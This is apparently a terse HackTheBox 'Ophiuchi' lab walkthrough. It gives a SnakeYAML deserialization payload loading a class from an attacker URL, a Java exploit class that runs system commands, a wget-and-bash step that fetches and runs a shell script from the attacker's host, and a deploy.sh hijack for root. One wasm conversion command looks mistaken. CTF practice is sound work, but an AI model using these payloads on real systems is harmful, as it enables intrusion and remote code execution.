HackTheBox — Ophiuchi

Nmap scan

Nmap scan report for 10.10.10.227 (10.10.10.227)
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open http Apache Tomcat 9.0.38
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.18 seconds

HTTP Enumeration

!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]

yaml/exploit.java

package yaml;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class exploit implements ScriptEngineFactory {
public exploit() {
try {
Runtime.getRuntime().exec("ping -c 2 10.10.16.5");
} catch (IOException e) {
e.printStackTrace();
}
}
@Override
public String getEngineName() {
return null;
}
@Override
public String getEngineVersion() {
return null;
}
@Override
public List<String> getExtensions() {
return null;
}
@Override
public List<String> getMimeTypes() {
return null;
}
@Override
public List<String> getNames() {
return null;
}
@Override
public String getLanguageName() {
return null;
}
@Override
public String getLanguageVersion() {
return null;
}
@Override
public Object getParameter(String key) {
return null;
}
@Override
public String getMethodCallSyntax(String obj, String m, String... args) {
return null;
}
@Override
public String getOutputStatement(String toDisplay) {
return null;
}
@Override
public String getProgram(String... statements) {
return null;
}
@Override
public ScriptEngine getScriptEngine() {
return null;
}
}
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]

Initial Foothold

Runtime.getRuntime().exec("wget http://10.10.16.5:8000/shell.sh -w /tmp/shell.sh");
Runtime.getRuntime().exec("bash /tmp/shell.sh");

Lateral Movement

Getting root

  • If “f” !=1 ==> “Not ready to deploy”
  • If “f” == 1 ==> “Ready to deploy” and executes the “deploy.sh” file.
./wasm2wat main.wasm -o main.wat
mv main.wasm main.wasm.bak
./wasm2wat main.wat -o main.wasm
chmod +x main.wasm deploy.sh
echo 'echo $(id);' > deploy.sh

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xEmbo

0xEmbo

15 Followers

I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.